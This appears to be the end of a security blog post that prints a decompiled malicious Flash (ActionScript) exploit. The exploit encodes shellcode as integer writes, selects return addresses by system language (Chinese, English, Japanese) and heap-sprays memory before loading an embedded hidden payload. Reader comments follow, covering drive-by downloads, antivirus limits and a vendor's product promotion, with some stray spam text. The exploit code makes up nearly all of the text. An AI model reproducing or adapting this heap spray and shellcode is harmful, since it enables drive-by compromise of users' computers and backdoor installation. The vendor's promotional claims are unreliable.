this.s.writeInt(1763555177); this.s.writeInt(242197223); this.s.writeInt(486673117); this.s.writeInt(3806519841); this.s.writeInt(1658456726); this.s.writeInt(3898792459); this.s.writeInt(2531746522); this.s.writeInt(160953187); this.s.writeInt(2598859378); this.s.writeInt(1920112130); this.s.writeInt(2330650850); this.s.writeInt(3798967015); this.s.writeInt(486673141); this.s.writeInt(3806519841); this.s.writeInt(183755490); this.s.writeInt(3797611491); this.s.writeInt(3865190638); this.s.writeInt(3792298170); this.s.writeInt(554310429); this.s.writeInt(488487204); this.s.writeInt(3847908285); this.s.writeInt(3817088421); this.s.writeInt(3877437985); this.s.writeInt(2976464561); this.s.writeInt(2292353762); this.s.writeInt(4074955445); this.s.writeInt(1772416522); this.s.writeInt(2585599261); this.s.writeInt(3122770868); this.s.writeInt(1771560553); this.s.writeInt(2529991393); this.s.writeInt(397699476); this.s.writeInt(3269531601); this.s.writeInt(732668751); this.s.writeInt(3777483065); this.s.writeInt(3982291672); this.s.writeInt(882305571); this.s.writeInt(702931256); this.s.writeInt(2718503897); this.s.writeInt(4254533052); this.s.writeInt(1773979361); this.s.writeInt(1065642478); this.s.writeInt(2842279166); this.s.writeInt(3779029478); this.s.writeInt(1776363337); this.s.writeInt(3166380298); this.s.writeInt(1109335325); this.s.writeInt(3499521006); this.s.writeInt(1732070745); this.s.writeInt(2171286445); this.s.writeInt(4232480269); this.s.writeInt(3045388061); this.s.writeInt(2062086682); this.s.writeInt(3123304899); this.s.writeInt(3806520034);
trace(this.s.length);
this.i = 0;
// push 176 copies of the ~1 MB block into the array: the heap spray
while (this.i < 176) { // label
    this.s2 = new ByteArray();
    this.s2.writeBytes(this.s, 0, this.s.length);
    trace(this.s2.length);
    this.a.push(this.s2);
    var _loc_1: String;
    _loc_1.i = this.i++;
} // end while
// decode the embedded hex string and load the bytes into a child Loader
this.r = this.hexToBin(this.t);
this.ldr = new Loader();
this.ldr.loadBytes(this.r);
stop();
return;
} // end function
}
}
//==============================================
package ie8_fla { import flash.display. * ; import flash.system. * ; import flash.utils. * ; dynamic public class MainTimeline extends MovieClip { public var s: Object; public var s2: Object; public var s3: Object; public var a: Object; public var i: Object; public var j: Object; public var sc_len: uint; public var t: Object; public var r_cn: ByteArray; public var ldr_cn: Loader; public var r: ByteArray; public var ldr: Loader; public var r_jp: ByteArray; public var ldr_jp: Loader; public function MainTimeline() { addFrameScript(0, this.frame1); return; } // end function public function hexToBin(param1: String): ByteArray { var _loc_2: String; var _loc_3: * = new ByteArray(); var _loc_4: * = param1.length; var _loc_5: uint; _loc_3.endian = Endian.LITTLE_ENDIAN; while (_loc_5 < _loc_4) { // label _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1); _loc_3.writeByte(parseInt(_loc_2, 16)); _loc_5 = _loc_5 + 2; } // end while return _loc_3; } // end function function frame1() { this.s = new ByteArray(); this.s2 = new ByteArray(); this.a = new Array(); this.sc_len = 0; this.t = "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"; trace("if"); if (Capabilities.language.toLowerCase() == "zh-cn") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); 
this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); 
this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("cn"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; 
_loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(2008988467); this.s.writeInt(3435973836); this.s.writeInt(2008964821); this.s.writeInt(3435973836); this.s.writeInt(2008944920); this.s.writeInt(2009023683); this.s.writeInt(3435973836); this.s.writeInt(2009016856); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r_cn = this.hexToBin(this.t); this.ldr_cn = new Loader(); this.ldr_cn.loadBytes(this.r_cn); } // end if if (Capabilities.language.toLowerCase() == "en") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); 
this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); 
this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); 
this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("en"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(1995123259); this.s.writeInt(3435973836); this.s.writeInt(1995172943); this.s.writeInt(3435973836); this.s.writeInt(2009141528); this.s.writeInt(2009220291); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(2009213464); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 
0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r = this.hexToBin(this.t); this.ldr = new Loader(); this.ldr.loadBytes(this.r); } // end if if (Capabilities.language.toLowerCase() == "ja") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); 
this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); 
this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("jp"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(2008857395); this.s.writeInt(3435973836); this.s.writeInt(2008833749); this.s.writeInt(3435973836); this.s.writeInt(2008813848); this.s.writeInt(2008892611); this.s.writeInt(3435973836); this.s.writeInt(2008885784); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label 
this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r_jp = this.hexToBin(this.t); this.ldr_jp = new Loader(); this.ldr_jp.loadBytes(this.r_jp); } else { trace("I am " + Capabilities.language); trace("failed"); } // end else if stop(); return; } // end function } }

8 comments:

Anonymous said...

nice work ;)

Anonymous said...

Now, this is cute. Using “normal browser behavior” and calling “no suspicious APIs” fakes out both traditional AV and heuristics-based engines. There's only one problem with this picture.

If you've seen our Security Assistant demo, you know that Security Assistant detects software as it's being downloaded and quarantines it, usually in the browser's cache, and in this scenario that's exactly what would happen. We sometimes fail to quarantine in cache if the downloader keeps a handle on the cache file, but as soon as the handle is released, we quarantine. Since the downloader must release its handle in order for the browser to execute the code, we grab it and quarantine it at handle release. Even if we failed at that point, we look at all starting processes and validate them, and nothing executing from cache can validate, so it would be blocked and immediately quarantined (so it can't try to execute again).

But “0 out of 42 antivirus vendors detected this exploit”? If you're using one of the 42, or any traditional AV product, give us a call. The only real advantage Security Assistant has over traditional AV is that Security Assistant actually works, and gives you some extremely useful tools to boot.

Doug.Finley@naknan.com

Anonymous said...

I think part of the issue here is that software is not getting downloaded in the normal sense. No scanner or download monitor will ever see this happening. A JPG or JP2 or JS file type is getting pulled down from the malicious site as part of a standard page load. Then other malicious scripts "execute" that JPG/JP2/JS file. I doubt that Security Assistant (or any AV product) will do deep scanning on all file types. Web surfing performance would slow to a crawl.
There are sandbox products like SandboxIE that can help to prevent an infection from taking root. There are more advanced solutions like Invincea that can isolate, detect and remediate infections that occur in a separate Virtual Machine.

But running any sort of scanner/av/anti-malware solution on the very host that is getting infected is a fool's bargain these days because they assume you can detect an infection BEFORE it can occur, and that is no longer the case.
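The drive-by cache pattern this comment describes (a payload pulled down as a JPG/JP2/JS resource during an ordinary page load and later run from the cache) can be checked for offline by comparing each cache entry's leading bytes against the type its extension claims. This is an added example, not code from the post or from any product named in the thread; the magic signatures are standard public file headers, and the extension list and sample cache files are constructed assumptions.

```python
import os
import tempfile

# Standard public file headers for content that should never sit behind an
# image or script extension in a browser cache (constructed list, not from
# the infected site).
EXECUTABLE_MAGIC = {
    b"MZ": "Windows PE executable",
    b"FWS": "uncompressed Flash (SWF)",
    b"CWS": "zlib-compressed Flash (SWF)",
    b"ZWS": "LZMA-compressed Flash (SWF)",
}
# Extensions a normal page load pulls without anyone looking twice (assumption).
PASSIVE_EXTENSIONS = {".jpg", ".jpeg", ".jp2", ".gif", ".png", ".js", ".css"}


def classify_bytes(header):
    """Return the executable type a header matches, or None for passive content."""
    for magic, name in EXECUTABLE_MAGIC.items():
        if header.startswith(magic):
            return name
    return None


def scan_cache_dir(cache_dir):
    """Map file name -> detected type for cache entries whose extension claims
    passive content (image, script) but whose leading bytes say PE or SWF."""
    findings = {}
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() not in PASSIVE_EXTENSIONS:
                continue
            with open(os.path.join(root, name), "rb") as fh:
                kind = classify_bytes(fh.read(4))
            if kind:
                findings[name] = kind
    return findings


def demo():
    """Constructed cache: a genuine JPEG, a JS file, and two disguised payloads."""
    cache = tempfile.mkdtemp(prefix="cache_demo_")
    samples = {
        "banner.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,  # real JPEG header
        "app.js": b"function f(){return 1;}",
        "logo.jpg": b"MZ\x90\x00" + b"\x00" * 60,           # PE behind a .jpg name
        "ad.jp2": b"CWS\x0a" + b"\x00" * 20,                # SWF behind a .jp2 name
    }
    for name, data in samples.items():
        with open(os.path.join(cache, name), "wb") as fh:
            fh.write(data)
    return scan_cache_dir(cache)
```

The check only looks at the first four bytes, so it catches a payload stored under an innocuous name but not one that has been wrapped or encoded before caching.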

Anonymous said...

"I doubt that Security Assistant (or any AV product) will do deep scanning on all file types."

That's where you're wrong. Security Assistant examines what's downloaded to see if it looks like software. If it does, it's quarantined. Want to see it in action?

Anonymous said...

"But running any sort of scanner/av/anti-malware solution on the very host that is getting infected is a fool's bargain these days because they assume you can detect an infection BEFORE it can occur, and that is no longer the case."

You're thinking the way all the traditional AV vendors want you to think. Detection sucks. Prevention works, but you have to have the right tool. Security Assistant examines everything that gets downloaded and reacts accordingly. You'd be surprised what we see quarantined every day from every PC in our company. And the PC users never even know something has been quarantined.

Paradigm shift.

M farhan saif said...

The vulnerability exploited is the same in both cases. The only difference is that previously Microsoft Excel was used as a vehicle to deliver the Adobe exploit, while here the same thing is being done by a drive-by download attack compromising the webserver. So the bottom line is: the vulnerability is the same, the attack vector is different. The other thing to note here is that post-exploitation behaviour also differs in both cases. Here it downloads the backdoor and executes it after the vuln is exploited, while previously we saw a different binary being dropped on the system. Hence, in simpler words, post-exploitation behaviour is different, the attack vector is different, while the vuln being exploited remains the same. - I run Flash animations

RJ Luqman Khan said...

Thank you for such an informative post. I have been searching Google for this vulnerability for a long time; my friend was of the opinion it never existed. Now I can prove him wrong BUITEMS :)

AwaraRock said...

You are right. They can be randomly obfuscated on-the-fly as they are served to victims. :)

how to kill lice
